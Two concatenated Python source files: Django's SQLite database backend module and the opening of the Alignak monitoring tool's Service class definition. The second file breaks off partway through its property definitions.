# Source: deployed/django, path: django/db/backends/sqlite3/base.py
"""
SQLite3 backend for django.
Works with either the pysqlite2 module or the sqlite3 module in the
standard library.
"""
from __future__ import unicode_literals
import datetime
import decimal
import warnings
import re
from django.conf import settings
from django.db import utils
from django.db.backends import (utils as backend_utils, BaseDatabaseFeatures,
BaseDatabaseOperations, BaseDatabaseWrapper, BaseDatabaseValidation)
from django.db.backends.sqlite3.client import DatabaseClient
from django.db.backends.sqlite3.creation import DatabaseCreation
from django.db.backends.sqlite3.introspection import DatabaseIntrospection
from django.db.backends.sqlite3.schema import DatabaseSchemaEditor
from django.db.models import fields
from django.db.models.sql import aggregates
from django.utils.dateparse import parse_date, parse_datetime, parse_time
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils.safestring import SafeBytes
from django.utils import six
from django.utils import timezone
try:
try:
from pysqlite2 import dbapi2 as Database
except ImportError:
from sqlite3 import dbapi2 as Database
except ImportError as exc:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading either pysqlite2 or sqlite3 modules (tried in that order): %s" % exc)
try:
import pytz
except ImportError:
pytz = None
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
def parse_datetime_with_timezone_support(value):
dt = parse_datetime(value)
# Confirm that dt is naive before overwriting its tzinfo.
if dt is not None and settings.USE_TZ and timezone.is_naive(dt):
dt = dt.replace(tzinfo=timezone.utc)
return dt
def adapt_datetime_with_timezone_support(value):
# Equivalent to DateTimeField.get_db_prep_value. Used only by raw SQL.
if settings.USE_TZ:
if timezone.is_naive(value):
warnings.warn("SQLite received a naive datetime (%s)"
" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return value.isoformat(str(" "))
def decoder(conv_func):
""" The Python sqlite3 interface returns always byte strings.
This function converts the received value to a regular string before
passing it to the receiver function.
"""
return lambda s: conv_func(s.decode('utf-8'))
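# Illustrative sketch (not part of the original module) of how decoder() wraps
# a converter; the names below are hypothetical and only show the
# decode-then-convert flow:
#
#     bool_conv = decoder(lambda s: s == '1')
#     bool_conv(b'1')   # -> True, the raw bytes are decoded to text first
#     bool_conv(b'0')   # -> False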
Database.register_converter(str("bool"), decoder(lambda s: s == '1'))
Database.register_converter(str("time"), decoder(parse_time))
Database.register_converter(str("date"), decoder(parse_date))
Database.register_converter(str("datetime"), decoder(parse_datetime_with_timezone_support))
Database.register_converter(str("timestamp"), decoder(parse_datetime_with_timezone_support))
Database.register_converter(str("TIMESTAMP"), decoder(parse_datetime_with_timezone_support))
Database.register_converter(str("decimal"), decoder(backend_utils.typecast_decimal))
Database.register_adapter(datetime.datetime, adapt_datetime_with_timezone_support)
Database.register_adapter(decimal.Decimal, backend_utils.rev_typecast_decimal)
if six.PY2:
Database.register_adapter(str, lambda s: s.decode('utf-8'))
Database.register_adapter(SafeBytes, lambda s: s.decode('utf-8'))
class DatabaseFeatures(BaseDatabaseFeatures):
# SQLite cannot handle us only partially reading from a cursor's result set
# and then writing the same rows to the database in another cursor. This
# setting ensures we always read result sets fully into memory all in one
# go.
can_use_chunked_reads = False
test_db_allows_multiple_connections = False
supports_unspecified_pk = True
supports_timezones = False
supports_1000_query_parameters = False
supports_mixed_date_datetime_comparisons = False
has_bulk_insert = True
can_combine_inserts_with_and_without_auto_increment_pk = False
supports_foreign_keys = False
supports_check_constraints = False
autocommits_when_autocommit_is_off = True
atomic_transactions = False
supports_paramstyle_pyformat = False
supports_sequence_reset = False
@cached_property
def uses_savepoints(self):
return Database.sqlite_version_info >= (3, 6, 8)
@cached_property
def supports_stddev(self):
"""Confirm support for STDDEV and related stats functions
SQLite supports STDDEV as an extension package; so
connection.ops.check_aggregate_support() can't unilaterally
rule out support for STDDEV. We need to manually check
whether the call works.
"""
with self.connection.cursor() as cursor:
cursor.execute('CREATE TABLE STDDEV_TEST (X INT)')
try:
cursor.execute('SELECT STDDEV(*) FROM STDDEV_TEST')
has_support = True
except utils.DatabaseError:
has_support = False
cursor.execute('DROP TABLE STDDEV_TEST')
return has_support
@cached_property
def has_zoneinfo_database(self):
return pytz is not None
class DatabaseOperations(BaseDatabaseOperations):
def bulk_batch_size(self, fields, objs):
"""
SQLite has a compile-time default (SQLITE_LIMIT_VARIABLE_NUMBER) of
999 variables per query.
If there is just a single field to insert, then we can hit another
limit, SQLITE_MAX_COMPOUND_SELECT which defaults to 500.
"""
limit = 999 if len(fields) > 1 else 500
return (limit // len(fields)) if len(fields) > 0 else len(objs)
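# Worked example of the batching arithmetic above (illustrative): with 3 fields
# per row the 999-variable limit applies, so one batch holds 999 // 3 == 333
# objects; with a single field the SQLITE_MAX_COMPOUND_SELECT limit applies
# instead and one batch holds 500 // 1 == 500 objects.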
def check_aggregate_support(self, aggregate):
bad_fields = (fields.DateField, fields.DateTimeField, fields.TimeField)
bad_aggregates = (aggregates.Sum, aggregates.Avg,
aggregates.Variance, aggregates.StdDev)
if (isinstance(aggregate.source, bad_fields) and
isinstance(aggregate, bad_aggregates)):
raise NotImplementedError(
'You cannot use Sum, Avg, StdDev and Variance aggregations '
'on date/time fields in sqlite3 '
'since date/time is saved as text.')
def date_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_date_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_extract('%s', %s)" % (lookup_type.lower(), field_name)
def date_interval_sql(self, sql, connector, timedelta):
# It would be more straightforward if we could use the sqlite strftime
# function, but it does not allow for keeping six digits of fractional
# second information, nor does it allow for formatting date and datetime
# values differently. So instead we register our own function that
# formats the datetime combined with the delta in a manner suitable
# for comparisons.
return 'django_format_dtdelta(%s, "%s", "%d", "%d", "%d")' % (sql,
connector, timedelta.days, timedelta.seconds, timedelta.microseconds)
def date_trunc_sql(self, lookup_type, field_name):
# sqlite doesn't support DATE_TRUNC, so we fake it with a user-defined
# function django_date_trunc that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_trunc('%s', %s)" % (lookup_type.lower(), field_name)
def datetime_extract_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_extract_sql.
if settings.USE_TZ:
if pytz is None:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("This query requires pytz, "
"but it isn't installed.")
return "django_datetime_extract('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_trunc_sql.
if settings.USE_TZ:
if pytz is None:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("This query requires pytz, "
"but it isn't installed.")
return "django_datetime_trunc('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def drop_foreignkey_sql(self):
return ""
def pk_default_value(self):
return "NULL"
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def no_limit_value(self):
return -1
def sql_flush(self, style, tables, sequences, allow_cascade=False):
# NB: The generated SQL below is specific to SQLite
# Note: The DELETE FROM... SQL generated below works for SQLite databases
# because constraints don't exist
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Note: No requirement for reset of auto-incremented indices (cf. other
# sql_flush() implementations). Just return SQL at this point
return sql
def value_to_db_datetime(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = value.astimezone(timezone.utc).replace(tzinfo=None)
else:
raise ValueError("SQLite backend does not support timezone-aware datetimes when USE_TZ is False.")
return six.text_type(value)
def value_to_db_time(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
raise ValueError("SQLite backend does not support timezone-aware times.")
return six.text_type(value)
def convert_values(self, value, field):
"""SQLite returns floats when it should be returning decimals,
and gets dates and datetimes wrong.
For consistency with other backends, coerce when required.
"""
if value is None:
return None
internal_type = field.get_internal_type()
if internal_type == 'DecimalField':
return backend_utils.typecast_decimal(field.format_number(value))
elif internal_type and internal_type.endswith('IntegerField') or internal_type == 'AutoField':
return int(value)
elif internal_type == 'DateField':
return parse_date(value)
elif internal_type == 'DateTimeField':
return parse_datetime_with_timezone_support(value)
elif internal_type == 'TimeField':
return parse_time(value)
# No field, or the field isn't known to be a decimal or integer
return value
def bulk_insert_sql(self, fields, num_values):
res = []
res.append("SELECT %s" % ", ".join(
"%%s AS %s" % self.quote_name(f.column) for f in fields
))
res.extend(["UNION ALL SELECT %s" % ", ".join(["%s"] * len(fields))] * (num_values - 1))
return " ".join(res)
def combine_expression(self, connector, sub_expressions):
# SQLite doesn't have a power function, so we fake it with a
# user-defined function django_power that's registered in connect().
if connector == '^':
return 'django_power(%s)' % ','.join(sub_expressions)
return super(DatabaseOperations, self).combine_expression(connector, sub_expressions)
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'sqlite'
# SQLite requires LIKE statements to include an ESCAPE clause if the value
# being escaped has a percent or underscore in it.
# See http://www.sqlite.org/lang_expr.html for an explanation.
operators = {
'exact': '= %s',
'iexact': "LIKE %s ESCAPE '\\'",
'contains': "LIKE %s ESCAPE '\\'",
'icontains': "LIKE %s ESCAPE '\\'",
'regex': 'REGEXP %s',
'iregex': "REGEXP '(?i)' || %s",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE %s ESCAPE '\\'",
'endswith': "LIKE %s ESCAPE '\\'",
'istartswith': "LIKE %s ESCAPE '\\'",
'iendswith': "LIKE %s ESCAPE '\\'",
}
pattern_ops = {
'startswith': "LIKE %s || '%%%%'",
'istartswith': "LIKE UPPER(%s) || '%%%%'",
}
Database = Database
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def get_connection_params(self):
settings_dict = self.settings_dict
if not settings_dict['NAME']:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
kwargs = {
'database': settings_dict['NAME'],
'detect_types': Database.PARSE_DECLTYPES | Database.PARSE_COLNAMES,
}
kwargs.update(settings_dict['OPTIONS'])
# Always allow the underlying SQLite connection to be shareable
# between multiple threads. The safe-guarding will be handled at a
# higher level by the `BaseDatabaseWrapper.allow_thread_sharing`
# property. This is necessary as the shareability is disabled by
# default in pysqlite and it cannot be changed once a connection is
# opened.
if 'check_same_thread' in kwargs and kwargs['check_same_thread']:
warnings.warn(
'The `check_same_thread` option was provided and set to '
'True. It will be overridden with False. Use the '
'`DatabaseWrapper.allow_thread_sharing` property instead '
'for controlling thread shareability.',
RuntimeWarning
)
kwargs.update({'check_same_thread': False})
return kwargs
def get_new_connection(self, conn_params):
conn = Database.connect(**conn_params)
conn.create_function("django_date_extract", 2, _sqlite_date_extract)
conn.create_function("django_date_trunc", 2, _sqlite_date_trunc)
conn.create_function("django_datetime_extract", 3, _sqlite_datetime_extract)
conn.create_function("django_datetime_trunc", 3, _sqlite_datetime_trunc)
conn.create_function("regexp", 2, _sqlite_regexp)
conn.create_function("django_format_dtdelta", 5, _sqlite_format_dtdelta)
conn.create_function("django_power", 2, _sqlite_power)
return conn
def init_connection_state(self):
pass
def create_cursor(self):
return self.connection.cursor(factory=SQLiteCursorWrapper)
def close(self):
self.validate_thread_sharing()
# If database is in memory, closing the connection destroys the
# database. To prevent accidental data loss, ignore close requests on
# an in-memory db.
if self.settings_dict['NAME'] != ":memory:":
BaseDatabaseWrapper.close(self)
def _savepoint_allowed(self):
# Two conditions are required here:
# - A sufficiently recent version of SQLite to support savepoints,
# - Being in a transaction, which can only happen inside 'atomic'.
# When 'isolation_level' is not None, sqlite3 commits before each
# savepoint; it's a bug. When it is None, savepoints don't make sense
# because autocommit is enabled. The only exception is inside 'atomic'
# blocks. To work around that bug, on SQLite, 'atomic' starts a
# transaction explicitly rather than simply disabling autocommit.
return self.features.uses_savepoints and self.in_atomic_block
def _set_autocommit(self, autocommit):
if autocommit:
level = None
else:
# sqlite3's internal default is ''. It's different from None.
# See Modules/_sqlite/connection.c.
level = ''
# 'isolation_level' is a misleading API.
# SQLite always runs at the SERIALIZABLE isolation level.
self.connection.isolation_level = level
def check_constraints(self, table_names=None):
"""
Checks each table name in `table_names` for rows with invalid foreign key references. This method is
intended to be used in conjunction with `disable_constraint_checking()` and `enable_constraint_checking()`, to
determine if rows with invalid references were entered while constraint checks were off.
Raises an IntegrityError on the first invalid foreign key reference encountered (if any) and provides
detailed information about the invalid reference in the error message.
Backends can override this method if they can more directly apply constraint checking (e.g. via "SET CONSTRAINTS
ALL IMMEDIATE")
"""
cursor = self.cursor()
if table_names is None:
table_names = self.introspection.table_names(cursor)
for table_name in table_names:
primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name)
if not primary_key_column_name:
continue
key_columns = self.introspection.get_key_columns(cursor, table_name)
for column_name, referenced_table_name, referenced_column_name in key_columns:
cursor.execute("""
SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING
LEFT JOIN `%s` as REFERRED
ON (REFERRING.`%s` = REFERRED.`%s`)
WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL"""
% (primary_key_column_name, column_name, table_name, referenced_table_name,
column_name, referenced_column_name, column_name, referenced_column_name))
for bad_row in cursor.fetchall():
raise utils.IntegrityError("The row in table '%s' with primary key '%s' has an invalid "
"foreign key: %s.%s contains a value '%s' that does not have a corresponding value in %s.%s."
% (table_name, bad_row[0], table_name, column_name, bad_row[1],
referenced_table_name, referenced_column_name))
def is_usable(self):
return True
def _start_transaction_under_autocommit(self):
"""
Start a transaction explicitly in autocommit mode.
Staying in autocommit mode works around a bug of sqlite3 that breaks
savepoints when autocommit is disabled.
"""
self.cursor().execute("BEGIN")
def schema_editor(self, *args, **kwargs):
"Returns a new instance of this backend's SchemaEditor"
return DatabaseSchemaEditor(self, *args, **kwargs)
FORMAT_QMARK_REGEX = re.compile(r'(?<!%)%s')
class SQLiteCursorWrapper(Database.Cursor):
"""
Django uses "format" style placeholders, but pysqlite2 uses "qmark" style.
This fixes it -- but note that if you want to use a literal "%s" in a query,
you'll need to use "%%s".
"""
def execute(self, query, params=None):
if params is None:
return Database.Cursor.execute(self, query)
query = self.convert_query(query)
return Database.Cursor.execute(self, query, params)
def executemany(self, query, param_list):
query = self.convert_query(query)
return Database.Cursor.executemany(self, query, param_list)
def convert_query(self, query):
return FORMAT_QMARK_REGEX.sub('?', query).replace('%%', '%')
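# Illustrative behaviour of convert_query() (the query text is hypothetical):
#
#     "SELECT * FROM t WHERE a = %s AND b LIKE '10%%'"
# becomes
#     "SELECT * FROM t WHERE a = ? AND b LIKE '10%'"
#
# i.e. "%s" placeholders become "?" and the escaped "%%" collapses to "%".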
def _sqlite_date_extract(lookup_type, dt):
if dt is None:
return None
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'week_day':
return (dt.isoweekday() % 7) + 1
else:
return getattr(dt, lookup_type)
def _sqlite_date_trunc(lookup_type, dt):
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if lookup_type == 'year':
return "%i-01-01" % dt.year
elif lookup_type == 'month':
return "%i-%02i-01" % (dt.year, dt.month)
elif lookup_type == 'day':
return "%i-%02i-%02i" % (dt.year, dt.month, dt.day)
def _sqlite_datetime_extract(lookup_type, dt, tzname):
if dt is None:
return None
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if tzname is not None:
dt = timezone.localtime(dt, pytz.timezone(tzname))
if lookup_type == 'week_day':
return (dt.isoweekday() % 7) + 1
else:
return getattr(dt, lookup_type)
def _sqlite_datetime_trunc(lookup_type, dt, tzname):
try:
dt = backend_utils.typecast_timestamp(dt)
except (ValueError, TypeError):
return None
if tzname is not None:
dt = timezone.localtime(dt, pytz.timezone(tzname))
if lookup_type == 'year':
return "%i-01-01 00:00:00" % dt.year
elif lookup_type == 'month':
return "%i-%02i-01 00:00:00" % (dt.year, dt.month)
elif lookup_type == 'day':
return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day)
elif lookup_type == 'hour':
return "%i-%02i-%02i %02i:00:00" % (dt.year, dt.month, dt.day, dt.hour)
elif lookup_type == 'minute':
return "%i-%02i-%02i %02i:%02i:00" % (dt.year, dt.month, dt.day, dt.hour, dt.minute)
elif lookup_type == 'second':
return "%i-%02i-%02i %02i:%02i:%02i" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
def _sqlite_format_dtdelta(dt, conn, days, secs, usecs):
try:
dt = backend_utils.typecast_timestamp(dt)
delta = datetime.timedelta(int(days), int(secs), int(usecs))
if conn.strip() == '+':
dt = dt + delta
else:
dt = dt - delta
except (ValueError, TypeError):
return None
# typecast_timestamp returns a date or a datetime without timezone.
# It will be formatted as "%Y-%m-%d" or "%Y-%m-%d %H:%M:%S[.%f]"
return str(dt)
def _sqlite_regexp(re_pattern, re_string):
return bool(re.search(re_pattern, force_text(re_string))) if re_string is not None else False
def _sqlite_power(x, y):
return x ** y
# Source: ddurieux/alignak, path: alignak/objects/service.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Hartmut Goebel, [email protected]
# Andreas Karfusehr, [email protected]
# aviau, [email protected]
# Nicolas Dupeux, [email protected]
# François Lafont, [email protected]
# Sebastien Coavoux, [email protected]
# Demelziraptor, [email protected]
# Jean Gabes, [email protected]
# Romain Forlot, [email protected]
# Arthur Gautier, [email protected]
# Frédéric MOHIER, [email protected]
# Frédéric Pégé, [email protected]
# Guillaume Bour, [email protected]
# Jean-Charles, [email protected]
# Jan Ulferts, [email protected]
# Grégory Starck, [email protected]
# Andrew McGilvray, [email protected]
# Christophe Simon, [email protected]
# Pradeep Jindal, [email protected]
# Hubert, [email protected]
# Alexander Springer, [email protected]
# Olivier Hanesse, [email protected]
# Gerhard Lausser, [email protected]
# Christophe SIMON, [email protected]
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
""" This Class is the service one, s it manage all service specific thing.
If you look at the scheduling part, look at the scheduling item class"""
import time
import re
import itertools
try:
from ClusterShell.NodeSet import NodeSet, NodeSetParseRangeError
except ImportError:
NodeSet = None
from alignak.objects.item import Items
from alignak.objects.schedulingitem import SchedulingItem
from alignak.autoslots import AutoSlots
from alignak.util import strip_and_uniq, format_t_into_dhms_format, to_svc_hst_distinct_lists, \
get_key_value_sequence, GET_KEY_VALUE_SEQUENCE_ERROR_SYNTAX, GET_KEY_VALUE_SEQUENCE_ERROR_NODEFAULT, \
GET_KEY_VALUE_SEQUENCE_ERROR_NODE, to_list_string_of_names, to_list_of_names, to_name_if_possible, \
is_complex_expr
from alignak.property import BoolProp, IntegerProp, FloatProp,\
CharProp, StringProp, ListProp, DictProp
from alignak.macroresolver import MacroResolver
from alignak.eventhandler import EventHandler
from alignak.log import logger, naglog_result
class Service(SchedulingItem):
# AutoSlots create the __slots__ with properties and
# running_properties names
__metaclass__ = AutoSlots
# Every service has a unique ID, and 0 is always special in
# database and co...
id = 1
# The host and service do not have the same 0 value, now yes :)
ok_up = 'OK'
# used by item class for format specific value like for Broks
my_type = 'service'
# properties defined by configuration
# required: is required in conf
# default: default value if no set in conf
# pythonize: function to call when transforming string to python object
# fill_brok: if set, send to broker. there are two categories:
# full_status for initial and update status, check_result for check results
# no_slots: do not take this property for __slots__
properties = SchedulingItem.properties.copy()
properties.update({
'host_name':
StringProp(fill_brok=['full_status', 'check_result', 'next_schedule']),
'hostgroup_name':
StringProp(default='', fill_brok=['full_status'], merging='join'),
'service_description':
StringProp(fill_brok=['full_status', 'check_result', 'next_schedule']),
'display_name':
StringProp(default='', fill_brok=['full_status']),
'servicegroups':
ListProp(default=[], fill_brok=['full_status'],
brok_transformation=to_list_string_of_names, merging='join'),
'is_volatile':
BoolProp(default=False, fill_brok=['full_status']),
'check_command':
StringProp(fill_brok=['full_status']),
'initial_state':
CharProp(default='o', fill_brok=['full_status']),
'max_check_attempts':
IntegerProp(default=1, fill_brok=['full_status']),
'check_interval':
IntegerProp(fill_brok=['full_status', 'check_result']),
'retry_interval':
IntegerProp(fill_brok=['full_status', 'check_result']),
'active_checks_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'passive_checks_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'check_period':
StringProp(brok_transformation=to_name_if_possible, fill_brok=['full_status']),
'obsess_over_service':
BoolProp(default=False, fill_brok=['full_status'], retention=True),
'check_freshness':
BoolProp(default=False, fill_brok=['full_status']),
'freshness_threshold':
IntegerProp(default=0, fill_brok=['full_status']),
'event_handler':
StringProp(default='', fill_brok=['full_status']),
'event_handler_enabled':
BoolProp(default=False, fill_brok=['full_status'], retention=True),
'low_flap_threshold':
IntegerProp(default=-1, fill_brok=['full_status']),
'high_flap_threshold':
IntegerProp(default=-1, fill_brok=['full_status']),
'flap_detection_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'flap_detection_options':
ListProp(default=['o', 'w', 'c', 'u'], fill_brok=['full_status'], split_on_coma=True),
'process_perf_data':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'retain_status_information':
BoolProp(default=True, fill_brok=['full_status']),
'retain_nonstatus_information':
BoolProp(default=True, fill_brok=['full_status']),
'notification_interval':
IntegerProp(default=60, fill_brok=['full_status']),
'first_notification_delay':
IntegerProp(default=0, fill_brok=['full_status']),
'notification_period':
StringProp(brok_transformation=to_name_if_possible, fill_brok=['full_status']),
'notification_options':
ListProp(default=['w', 'u', 'c', 'r', 'f', 's'],
fill_brok=['full_status'], split_on_coma=True),
'notifications_enabled':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'contacts':
ListProp(default=[], brok_transformation=to_list_of_names,
fill_brok=['full_status'], merging='join'),
'contact_groups':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
'stalking_options':
ListProp(default=[''], fill_brok=['full_status'], merging='join'),
'notes':
StringProp(default='', fill_brok=['full_status']),
'notes_url':
StringProp(default='', fill_brok=['full_status']),
'action_url':
StringProp(default='', fill_brok=['full_status']),
'icon_image':
StringProp(default='', fill_brok=['full_status']),
'icon_image_alt':
StringProp(default='', fill_brok=['full_status']),
'icon_set':
StringProp(default='', fill_brok=['full_status']),
'failure_prediction_enabled':
BoolProp(default=False, fill_brok=['full_status']),
'parallelize_check':
BoolProp(default=True, fill_brok=['full_status']),
# Alignak specific
'poller_tag':
StringProp(default='None'),
'reactionner_tag':
StringProp(default='None'),
'resultmodulations':
ListProp(default=[], merging='join'),
'business_impact_modulations':
ListProp(default=[], merging='join'),
'escalations':
ListProp(default=[], fill_brok=['full_status'], merging='join', split_on_coma=True),
'maintenance_period':
StringProp(default='',
brok_transformation=to_name_if_possible, fill_brok=['full_status']),
'time_to_orphanage':
IntegerProp(default=300, fill_brok=['full_status']),
'merge_host_contacts':
BoolProp(default=False, fill_brok=['full_status']),
'labels':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
'host_dependency_enabled':
BoolProp(default=True, fill_brok=['full_status']),
# BUSINESS CORRELATOR PART
# Business rules output format template
'business_rule_output_template':
StringProp(default='', fill_brok=['full_status']),
# Business rules notifications mode
'business_rule_smart_notifications':
BoolProp(default=False, fill_brok=['full_status']),
# Treat downtimes as acknowledgements in smart notifications
'business_rule_downtime_as_ack':
BoolProp(default=False, fill_brok=['full_status']),
# Enforces child nodes notification options
'business_rule_host_notification_options':
ListProp(default=None, fill_brok=['full_status'], split_on_coma=True),
'business_rule_service_notification_options':
ListProp(default=None, fill_brok=['full_status'], split_on_coma=True),
# Easy Service dep definition
'service_dependencies': # TODO: find a way to brok it?
ListProp(default=None, merging='join', split_on_coma=True),
# service generator
'duplicate_foreach':
StringProp(default=''),
'default_value':
StringProp(default=''),
# Business_Impact value
'business_impact':
IntegerProp(default=2, fill_brok=['full_status']),
# Load some triggers
'trigger':
StringProp(default=''),
'trigger_name':
StringProp(default=''),
'trigger_broker_raise_enabled':
BoolProp(default=False),
# Trending
'trending_policies':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
# Our check ways. By default empty, but will be filled by an inner one if needed
'checkmodulations':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
'macromodulations':
ListProp(default=[], merging='join'),
# Custom views
'custom_views':
ListProp(default=[], fill_brok=['full_status'], merging='join'),
# UI aggregation
'aggregation':
StringProp(default='', fill_brok=['full_status']),
# Snapshot part
'snapshot_enabled':
BoolProp(default=False),
'snapshot_command':
StringProp(default=''),
'snapshot_period':
StringProp(default=''),
'snapshot_criteria':
ListProp(default=['w', 'c', 'u'], fill_brok=['full_status'], merging='join'),
'snapshot_interval':
IntegerProp(default=5),
})
# properties used in the running state
running_properties = SchedulingItem.running_properties.copy()
running_properties.update({
'modified_attributes':
IntegerProp(default=0L, fill_brok=['full_status'], retention=True),
'last_chk':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'next_chk':
IntegerProp(default=0, fill_brok=['full_status', 'next_schedule'], retention=True),
'in_checking':
BoolProp(default=False,
fill_brok=['full_status', 'check_result', 'next_schedule'], retention=True),
'in_maintenance':
IntegerProp(default=None, fill_brok=['full_status'], retention=True),
'latency':
FloatProp(default=0, fill_brok=['full_status', 'check_result'], retention=True,),
'attempt':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'state':
StringProp(default='PENDING',
fill_brok=['full_status', 'check_result'], retention=True),
'state_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'current_event_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_event_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_state':
StringProp(default='PENDING',
fill_brok=['full_status', 'check_result'], retention=True),
'last_state_type':
StringProp(default='HARD', fill_brok=['full_status', 'check_result'], retention=True),
'last_state_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_state_change':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'last_hard_state_change':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'last_hard_state':
StringProp(default='PENDING', fill_brok=['full_status'], retention=True),
'last_hard_state_id':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'last_time_ok':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_time_warning':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_time_critical':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'last_time_unknown':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'duration_sec':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'state_type':
StringProp(default='HARD', fill_brok=['full_status', 'check_result'], retention=True),
'state_type_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'output':
StringProp(default='', fill_brok=['full_status', 'check_result'], retention=True),
'long_output':
StringProp(default='', fill_brok=['full_status', 'check_result'], retention=True),
'is_flapping':
BoolProp(default=False, fill_brok=['full_status'], retention=True),
# dependencies for actions like notif of event handler,
# so AFTER check return
'act_depend_of':
ListProp(default=[]),
# dependencies for checks raise, so BEFORE checks
'chk_depend_of':
ListProp(default=[]),
# elements that depend on me, so the reverse of the above
'act_depend_of_me':
ListProp(default=[]),
# elements that depend on me
'chk_depend_of_me':
ListProp(default=[]),
'last_state_update':
FloatProp(default=0.0, fill_brok=['full_status'], retention=True),
# no brok because checks are too linked
'checks_in_progress':
ListProp(default=[]),
# no broks because notifications are too linked
'notifications_in_progress': DictProp(default={}, retention=True),
'downtimes':
ListProp(default=[], fill_brok=['full_status'], retention=True),
'comments':
ListProp(default=[], fill_brok=['full_status'], retention=True),
'flapping_changes':
ListProp(default=[], fill_brok=['full_status'], retention=True),
'flapping_comment_id':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'percent_state_change':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'problem_has_been_acknowledged':
BoolProp(default=False, fill_brok=['full_status', 'check_result'], retention=True),
'acknowledgement':
StringProp(default=None, retention=True),
'acknowledgement_type':
IntegerProp(default=1, fill_brok=['full_status', 'check_result'], retention=True),
